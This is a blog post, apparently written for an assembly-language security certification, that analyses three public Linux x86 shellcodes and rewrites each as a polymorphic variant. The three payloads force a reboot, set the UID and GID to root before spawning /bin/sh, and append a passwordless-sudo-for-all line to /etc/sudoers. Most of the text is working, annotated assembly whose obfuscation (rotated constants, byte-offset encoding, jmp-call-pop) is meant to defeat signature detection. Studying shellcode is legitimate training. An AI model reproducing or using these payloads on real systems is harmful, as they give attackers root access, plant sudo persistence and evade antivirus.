In this blog post I will transform three Linux Intel x86 shellcodes via polymorphic patterns.
1. Linux/x86 Force Reboot shellcode
Link to original shellcode: http://shell-storm.org/shellcode/files/shellcode-831.php
Original shellcode with analysis
00000000 31C0 xor eax,eax ; zeroing eax
00000002 50 push eax ; stack content(hex): 00
00000003 68626F6F74 push dword 0x746f6f62 ; stack content(hex): 62 6f 6f 74 00
00000008 686E2F7265 push dword 0x65722f6e ; stack content(hex): 6e 2f 72 65 62 6f 6f 74 00
0000000D 682F736269 push dword 0x6962732f ; stack content(hex): 2f 73 62 69 6e 2f 72 65 62 6f 6f 74 00 => "/sbin/reboot0x00"
00000012 89E3 mov ebx,esp ; ebx points to "/sbin/reboot0x00"
00000014 50 push eax ; stack content(hex): 00 00 00 00 2f 73 62 69 6e 2f 72 65 62 6f 6f 74 00
00000015 66682D66 push word 0x662d ; stack content(hex): 2d 66 00 00 00 00 2f 73 62 69 6e 2f 72 65 62 6f 6f 74 00
00000019 89E6 mov esi,esp ; esi points to 2d 66 00 00 00 00 2f 73 62 69 6e 2f 72 65 62 6f 6f 74 00
0000001B 50 push eax ; stack content(hex): 00 00 00 00 2d 66 00 00 00 00 2f 73 62 69 6e 2f 72 65 62 6f 6f 74 00
0000001C 56 push esi ; stack content(hex): &esi 00 00 00 00 2d 66 00 00 00 00 2f 73 62 69 6e 2f 72 65 62 6f 6f 74 00
0000001D 53 push ebx ; stack content(hex): &ebx &esi 00 00 00 00 2d 66 00 00 00 00 2f 73 62 69 6e 2f 72 65 62 6f 6f 74 00
0000001E 89E1 mov ecx,esp ; ecx points to &ebx &esi 00 00 00 00 2d 66 00 00 00 00 2f 73 62 69 6e 2f 72 65 62 6f 6f 74 00
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; (gdb) x/16wx $ecx
; 0xbffff2aa: 0xbffff2bc 0xbffff2b6 0x00000000 0x0000662d
; 0xbffff2ba: 0x732f0000 0x2f6e6962 0x6f626572 0x0000746f
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
00000020 B00B mov al,0xb ; invoke system call execve()
00000022 CD80 int 0x80 ; invoke system call execve()
This shellcode executes /sbin/reboot command via execve() system call stack method. Shellcode length is 36 bytes.
Mutated shellcode with analysis
; File: shellcode_1_force_reboot_mutated.nasm
; Author: Petr Javorik
global _start
section .text
_start:
xor edx, edx
push edx
push 0xe8dedec4 ; 0xe8dedec4 bitwise shift -1 is 0x746f6f62
ror dword [esp], 1 ; shift back to 0x746f6f62
push 0xcae45edc ; 0xcae45edc bitwise shift -1 is 0x65722f6e
ror dword [esp], 1 ; shift back to 0x65722f6e
push 0xd2c4e65e ; 0xd2c4e65e bitwise shift -1 is 0x6962732f
ror dword [esp], 1 ; shift back to 0x6962732f
mov ebx,esp
push edx
push word 0x805c ; 0x805C - 0x1a2f = 0x662d
sub word [esp -0x4], 0x1a2f ; 0x805C - 0x1a2f = 0x662d
mov edi, esp ; change esi to edi
push edx
push edi ; change esi to edi
push ebx
mov ecx, esp
mov eax, edx ; added instruction
mov al, 0xb
int 0x80
Mutated shellcode has size of 54 bytes which is 50% more than original shellcode.
2. Linux/x86 sys_setuid(0) & sys_setgid(0) & /bin/sh shellcode
Link to original shellcode: http://shell-storm.org/shellcode/files/shellcode-631.php
Original shellcode with analysis
00000000 EB19 jmp short 0x1b ; jmp-call-pop pattern
00000002 31C0 xor eax,eax ; zeroing eax
00000004 B017 mov al,0x17 ; eax=0x17
00000006 31DB xor ebx,ebx ; zeroing ebx
00000008 CD80 int 0x80 ; invoke system call 0x17(23), setuid(0)
0000000A 31C0 xor eax,eax ; zeroing eax
0000000C B02E mov al,0x2e ; eax=0x2e
0000000E 31DB xor ebx,ebx ; zeroing ebx
00000010 CD80 int 0x80 ; invoke system call 0x2e(46), setgid(0)
00000012 31C0 xor eax,eax ; zeroing eax
00000014 B00B mov al,0xb ; eax=0xb
00000016 5B pop ebx ; ebx points to 2F62696E2F7368 = "/bin/sh"
00000017 89D1 mov ecx,edx ; ecx=0
00000019 CD80 int 0x80 ; invoke system call 0xb(11), execve("/bin/sh", 0, 0)
0000001B E8E2FFFFFF call dword 0x2 ; load 00000020 into stack, jump to 00000002
00000020 2F das ; jmp-call-pop data "/bin/sh"
00000021 62696E bound ebp,[ecx+0x6e] ; jmp-call-pop data "/bin/sh"
00000024 2F das ; jmp-call-pop data "/bin/sh"
00000025 7368 jnc 0x8f ; jmp-call-pop data "/bin/sh"
This shellcode sets effective UID and effective GID of current process to 0 and then invokes /bin/sh via execve() system call. Shellcode length is 39 bytes.
Mutated shellcode with analysis
; File: shellcode_2_setuid_gid_sh_mutated.nasm
; Author: Petr Javorik
global _start
section .text
_start:
jmp short getdata
interrupt: ; added calls to interrupt
int 0x80
ret
run:
xor esi, esi ; change zeroing eax method
mul esi ; change zeroing eax method
mov ecx, edx ; changed mov ecx, edx place
mov al, 0x17
mov ebx, esi ; changed instruction to zero ebx
int 0x80
mul esi ; change zeroing eax method
mov ebx, eax ; change place and zeroing instruction
mov al, 0x2e
call interrupt
pop ebx ; changed pop ebx place
mul esi ; change zeroing eax method
mov al, 0xb
mov edi, ebx
loop:
sub byte [edi], 0x41 ; sub 0x41 from every data byte
jz break
inc edi
jmp short loop
break:
jmp short interrupt
getdata:
call run
data db 0x70, 0xA3, 0xAA, 0xAF, 0x70, 0xB4, 0xA9, 0x41 ; add 0x41 to every data byte
Mutated shellcode has size of 58 bytes which is 50% more than original shellcode.
3. Linux/x86 edit /etc/sudoers for full access shellcode
Link to original shellcode: http://shell-storm.org/shellcode/files/shellcode-62.php
Original shellcode with analysis
00000000 31C0 xor eax, eax ; zeroing eax
00000002 50 push eax ; stack content(hex,dword): 00000000
00000003 686F657273 push dword 0x7372656f ; stack content(hex,dword): 7372656f 00000000
00000008 682F737564 push dword 0x6475732f ; stack content(hex,dword): 6475732f 7372656f 00000000
0000000D 682F657463 push dword 0x6374652f ; stack content(hex,dword): 6374652f 6475732f 7372656f 00000000 (cte/ dus/ sreo) => /etc/sudoers
00000012 89E3 mov ebx, esp ; ebx points to "/etc/sudoers"
00000014 66B90104 mov cx, 0x401 ; ecx=0x401
00000018 B005 mov al, 0x5 ; eax=0x5
0000001A CD80 int 0x80 ; invoke system call 0x5 open("/etc/sudoers", O_WRONLY|O_APPEND)
0000001C 89C3 mov ebx,eax ; load file descriptor to ebx
0000001E 31C0 xor eax,eax ; zeroing eax
00000020 50 push eax ; stack content(hex,dword): 00000000
00000021 68414C4C0A push dword 0xa4c4c41 ; stack content(hex,dword): 0a4c4c41 00000000
00000026 6857443A20 push dword 0x203a4457 ; stack content(hex,dword): 203a4457 0a4c4c41 00000000
0000002B 6850415353 push dword 0x53534150 ; stack content(hex,dword): 53534150 203a4457 0a4c4c41 00000000
00000030 6829204E4F push dword 0x4f4e2029 ; stack content(hex,dword): 4f4e2029 53534150 203a4457 0a4c4c41 00000000
00000035 6828414C4C push dword 0x4c4c4128 ; stack content(hex,dword): 4c4c4128 4f4e2029 53534150 203a4457 0a4c4c41 00000000
0000003A 68414C4C3D push dword 0x3d4c4c41 ; stack content(hex,dword): 3d4c4c41 4c4c4128 4f4e2029 53534150 203a4457 0a4c4c41 00000000
0000003F 68414C4C20 push dword 0x204c4c41 ; stack content(hex,dword): 204c4c41 3d4c4c41 4c4c4128 4f4e2029 53534150 203a4457 0a4c4c41 00000000
; LLA =LLA LLA( ON ) SSAP :DW \nLLA
; ALL ALL=(ALL) NOPASSWD: ALL/n
00000044 89E1 mov ecx, esp ; ecx points to "ALL ALL=(ALL) NOPASSWD: ALL/n0x00"
00000046 B21C mov dl, 0x1c ; edx=0x1c
00000048 B004 mov al, 0x4 ; eax=0x4
0000004A CD80 int 0x80 ; invoke system call 0x4 write(fd, "ALL ALL=(ALL) NOPASSWD: ALL/n", 0x1c(28))
0000004C B006 mov al, 0x6 ; eax=0x6
0000004E CD80 int 0x80 ; invoke system call 0x6 close(fd)
00000050 31DB xor ebx, ebx ; zeroing ebx
00000052 B001 mov al, 0x1 ; eax=0x1
00000054 CD80 int 0x80 ; invoke system call 0x1 exit(0)
This shellcode adds “ALL ALL=(ALL) NOPASSWD: ALL/n” line to /etc/sudoers which allows any user to sudo without password. Shellcode length is 86 bytes.
Mutated shellcode with analysis
; File: shellcode_3_edit_sudoers_mutated.nasm
; Author: Petr Javorik
global _start
section .text
_start:
jmp short getdata
run:
; open("/etc/sudoers", O_WRONLY|O_APPEND)
pop ebx
mov byte [ebx +12], cl ; insert NULL terminator
mov byte [ebx +40], 0xa ; insert \n
mov cx, 0x401 ; O_WRONLY|O_APPEND
push 0x5
pop eax
int 0x80
; write(fd, "ALL ALL=(ALL) NOPASSWD: ALL/n", 0x1c(28))
lea ecx, [ebx +13]
mov ebx, eax
push 0x1c
pop edx
push 0x4
pop eax
int 0x80
; close(fd)
push 0x6
pop eax
int 0x80
; exit(0)
push 0x1
pop eax
int 0x80
getdata:
call run
data1: db "/etc/sudoers", 0xaa
data2: db "ALL ALL=(ALL) NOPASSWD: ALL", 0xaa
Mutated shellcode is JMP-CALL-POP version of the original shellcode and has size of 88 bytes which is about 2.32% increase.
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification
Student ID: SLAE-1443